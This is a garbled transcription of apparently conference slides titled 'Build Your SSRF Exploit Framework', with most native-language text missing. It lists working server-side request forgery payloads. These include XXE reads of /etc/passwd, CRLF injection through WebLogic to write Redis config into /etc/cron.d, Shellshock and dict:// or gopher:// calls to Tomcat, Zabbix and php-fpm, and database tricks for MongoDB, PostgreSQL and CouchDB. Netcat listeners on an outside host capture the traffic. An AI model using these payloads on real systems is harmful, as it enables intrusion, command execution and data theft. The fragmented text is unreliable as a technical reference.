Build Your SSRF Exploit Framework SSRF

Transcription

1 Build Your SSRF Exploit Framework SSRF

2 @ringzero

3 KNOW IT HACK IT HOW SSRF SSRF SSRF SSRF SSRF

4 KNOW IT, SSRF? Web Interface

5 KNOW IT SSRF

6 Redis server HTTP server 80 & 8080 SSRF_Interface APP server

7 SSRF ( FingerPrint ) {Payload} DOS( Keep-Alive Always ) users / dirs / files

8 SSRF Request MongoDB MemCache Redis-Server

9 100% OpenSSL (Cookies & User:Pass)

10 OpenSSL TSL HELLO OpenSSL SSL

11 Cookies, USER & PASS,?!!! WEB SERVER 1024 * DOS

12 KNOW IT, SSRF SSRF ( Upload from URL, Import & Export RSS feed) (Oracle MongoDB MSSQL Postgres CouchDB) Webmail (POP3/IMAP/SMTP) (ffpmg, ImageMaic, DOCX, PDF XML )

13 -> SSRF Upload from URL Discuz! Import & Export RSS feed Web Blog XML Wordpress xmlrpc.php

14 XML -> SSRF XXE XSLT Template DTD XML XSLT Processor (Saxon) Output Files XLST -- XML

15 XML Fuzz Cheatsheet ( ) DTD Remote Access <!ENTITY % d SYSTEM " XML External Entity <!ENTITY % file system "file:///etc/passwd" > <!ENTITY % d SYSTEM URL Invocation URL XML Encryption XML <xenc:agreementmethod Algorithm= " <xenc:encryptionproperty Target= " <xenc:cipherreference URI= " <xenc:datareference URI= <!DOCTYPE roottag PUBLIC "-//VSR//PENTEST//EN" <roottag>test</roottag>

16 XML Fuzz Cheatsheet Web Services XML Signature XML <Reference URI= WS Policy SOA WS <To xmlns= <ReplyTo xmlns=" <Address> </ReplyTo> WS Addressing Web Services From WS Security JAVA WEB <wsp:policyreference URI= <input message="wooyun" wsa:action=" /> <output message="wooyun" wsa:action=" />

17 XML Fuzz Cheatsheet WS Federation Web Services <fed:federation FederationID=" <fed:federationinclude> <fed:tokenissuername> <mex:metadatareference> <wsa:address> XBRL </mex:metadatareference> <xbrli:identifier scheme=" <link:roletype roleuri= ODATA (edmx) <edmx:reference URI=" <edmx:annotationsreference URI=" STRATML <stratml:source>

18 (MongoDB) -> SSRF > db.copydatabase('\r\nconfig set dbfilename wyssrf\r\nquit\r\n,'test',' :6379') ~]# nc -l -vv 6379 Connection from port 6379 [tcp/*] config set dbfilename wyssrf quit.system.namespaces > db.copydatabase( helo','test',' :22'); {"errmsg" : helo.systemnamespaces failed: " } > db.copydatabase( helo','test',' :9999'); {"errormsg" : "couldn't connect to server :9999"} MongoDB Server

19 (Oracle) -> SSRF UTL_HTTP UTL_TCP UTL_SMTP

20 (PostgresSQL) -> SSRF dblink_send_query() SELECT dblink_send_query( host= dbname=quit user=\'\r\nconfig set dbfilename wyssrf\r\n\quit\r\n password=1 port=6379 sslmode=disable, 'select version(); ); ~]# nc -l -vv 6379 Connection from port 6379 [tcp/*] config set dbfilename wyssrf quit

21 (MSSQL) -> SSRF OpenRowset() SELECT openrowset('sqloledb', 'server= ;uid=sa;pwd=sa;database=master') : OpenDatasource() XP_CMDSHELL SELECT * FROM OpenDatasource('SQLOLEDB', 'Data Source=ServerName;User ID=sa;Password=sa' ).Northwind.dbo.Categories

22 (CouchDB) -> SSRF HTTP API /_replicate POST Content-Type: application/json Accept: application/json { "source" : "recipes", "target" : dict://redis.wuyun.org:6379/flushall, }

23 Webmail (POP3/IMAP/SMTP) -> SSRF QQ 163/126

24 -> SSRF FFmpeg concat: file:///etc/passwd ImageMagick (mvg URL HTTP ) fill 'url( & PDF DOCX XML parsers ( XSLT ) XSLT 100 document(): xml include(): import():

25 HACK IT SSRF

26 HACK IT, SSRF & {payload}? IP (xip.io IP IP) (Redirect CRLF header injection) XXE -> SSRF -> CSRF (Protocols & Wrappers)

27 ? URI Domain.tld url= (wooyun ) 10 / 172 / 192 / 127 IP IP *256**3 + *256**2 + *256 IP = startswith( http ) 302 Redirect CRLF ( Ascii Code ) header injection ASCII %20 -> 0x20 -> %23 -> 0x23 -> # %0d -> 0x0d -> CR \r %0a -> 0x0a-> LF \n %08 -> 0x08 -> BS %00 -> 0x00 -> Null Byte

28 SSRF -> http Discuz! SSRF /forum.php?mod=ajax&action=downremoteimg&message= [img] HTTP Scheme > DICT Scheme 302.php <?php header("location: dict://wuyun.org:6379/set:1:helo ); # set 1 helo \n

29 WebLogic SSRF HTTP ( ) CRLF Header Injection HTTP POST /helo HTTP/1.1 Content-Type: text/xml; charset=utf-8 WebLogic uddiexplorer SSRF User-Agent: Java1.6.0_11 Host: wuyun.org Connection: Keep-Alive SearchPublicRegistries.jsp? operator= rdosearch=name&btnsubmit=search CRLF ->ASCII Code <?xml version="1.0" encoding="utf-8" standalone="yes"?> <env:envelope xmlns:soapenc= xmlns:xsd= xmlns:xsi=" <env:header></env:header><env:body> <find_business generic="2.0" xmlns="urn:uddi-org:api_v2"> <name>%</name></find_business> </env:body></env:envelope> - %0d -> 0x0d-> \r - %0a -> 0x0a -> \n

30 WebLogic SSRF CRLF HTTP 0-day 1 operator= HTTP/1.1 %0d%0a(\r\n) HOST: fuzz.wuyun.com %0d%0a(\r\n) [root@wuyun.org ~]# nc -l 80 POST /helo HTTP/1.1 HOST: fuzz.wuyun.com User-Agent: Java1.6.0_11 Host: wuyun.org 2 operator= %0d%0a(\r\n) config set dir /etc/cron.d/ %0d%0a(\r\n) quit%0d%0a(\r\n) [root@wuyun.org ~]# nc -l 6379 POST /helo config set dir /etc/cron.d/ quit HTTP/1.1

31 WebLogic SSRF operator= %08%08%08%08%08%08 %0d%0a USER ftp SHELLSHOCK %0d%0a POST /cgi-bin/test-cgi%0d%0a PASS ftp User-Agent: () { foo;};echo;/bin/ping cloudeye.me %0d%0a %0d%0a HTTP/1.1 pwd %0d%0a GET /abc%0d%0a

32 WebLogic SSRF (FingerPrint) weblogic.uddi.client.structures.exception.xml_soapexception: Tried all: '1' addresses, but could not connect over HTTP to server: 'fuzz.wuyun.com', port: '88' weblogic.uddi.client.structures.exception.xml_soapexception: Received a response from url: which did not have a valid SOAP content-type: text/html; charset=utf-8. weblogic.uddi.client.structures.exception.xml_soapexception: Received a response from url: which did not have a valid SOAP content-type: null. weblogic.uddi.client.structures.exception.xml_soapexception: Received a response from url: which did not have a valid SOAP content-type: null. <dispositionreport generic="2.0" operator="

33 DEMO : WebLogic SSRF CRLF + Redis

34 WebLogic SSRF 80% BEA & Oracle 70% WebLogic & 90%

35 SSRF -> Protocols & Wrappers Atlassian Confluence CVE /spaces/viewdefaultdecorator.action?decoratorname=./web-inf/web.xml & /etc/passwd /spaces/viewdefaultdecorator.action?decoratorname=file:///etc/passwd /spaces/viewdefaultdecorator.action?decoratorname=gopher://wuyun.org/_hi Resin-Doc /resin-doc/resource/tutorial/jndi-appconfig/test?inputfile=/etc/passwd /resin-doc/resource/tutorial/jndi-appconfig/test?inputfile=gopher://wuyun.org/_hi

36 SSRF -> Protocols & Wrappers PHP Java sun.net. file ftp gopher http https jar mailto netdoc file:// Accessing local filesystem Accessing HTTP(s) URLs ftp:// Accessing FTP(s) URLs php:// Accessing various I/O streams zlib:// Compression Streams data:// Data (RFC 2397) glob:// Find pathnames matching pattern phar:// PHP Archive ssh2:// Secure Shell 2 rar:// RAR expect:// Process Interaction Streams

37 SSRF -> UDP FTP & SMTP & POP3 GET /path HTTP/1.1 POST /path HTTP/1.1 HTTP tftp:// /get helo SMBreplay & BadTunnel WebDav: PUT MOVE DEL UNC Call: \\ \c$\boot.ini tftp ftp telnet dict ldap ldaps http file https ftps scp sftp

38 1 -> SSRF Tomcat Management dict://localhost:8005/shutdown%0d%0a dict://localhost:10050/vfs.file.regexp[/etc/hosts,7] Zabbix Agentd ZBXD? localhost dict://localhost:10050/system.run[ls] Nagios Agentd ZBXD,usr etc var boot Fastcgi ( php-fpm ) gopher://localhost:9000/_...[php_value allow_url_include = On]

39 2 -> SSRF & REDIS 6 Redis 1. www, webshell 2. SSH authotrized_keys Memcached 3. (/var/spool/cron/ & /etc/cron.d/) CouchDB slave of /etc/profile.d/ AOF appendfilename

40 SSRF Memcached Session adminid= Memecached JS/html... vbulletin ( Memcached ) Discuz ( Redis & Memcached )

41 SSRF CouchDB SSRF HTTP /_replicate API SSRF Restful API curl -X PUT ' -d '"/sbin/ifconfig >/tmp/6666"' > CouchDB

42 3 XXE -> SSRF -> CSRF Cor IP /apiws/services/api?wsdl & Cor XML XXE SSRF SSRF API

43 HOW?

44 How Python furl / requests / multiprocessing / time / re (http <GET POST> dict gopher tftp)

45 Keep-Alive: timeout=5 ftp://wuyun.org:6379 Keep-Alive http & dict://wuyun.org:6379, / > db.copydatabase( helo','test',' :22'); {"errmsg" : helo.systemnamespaces failed: " } > db.copydatabase( helo','test',' :6379'); {"errormsg" : "couldn't connect to server :6379"} [root@localhost ~] # curl SSH-2.0-OpenSSH_5.3 Protocol mismatch.

46 SITE : tangscan.com SSRF

47 jboss.py jdwp.py shellshock.py axis2.py jenkins.py smtp.py confluence.py struts2.py couchdb.py mongodb.py tftp.py docker.py php_fastcgi.py jboss invoker war java bash axis2-admin Server jenkins scripts smtp confluence ssrf (gopher) struts2 counchdb WEB API mongodb SSRF tftp udp docker API php_fpm, fastcgi gopher SHELL

48 tomcat.py elasticsearch.py pop.py webdav.py ftp.py portscan.py websphere.py gopher.py pstack.py zentaopms.py hfs.py glassfish.py tomcat /manager/html war ES Groovy pop3 WebDav PUT ftp WebSphere Admin war gopher do anything Apache Hadoop zentopms HFS glassfish war

49 SQLMAP python wyssrf.py config -u -p url

50 SSRF

51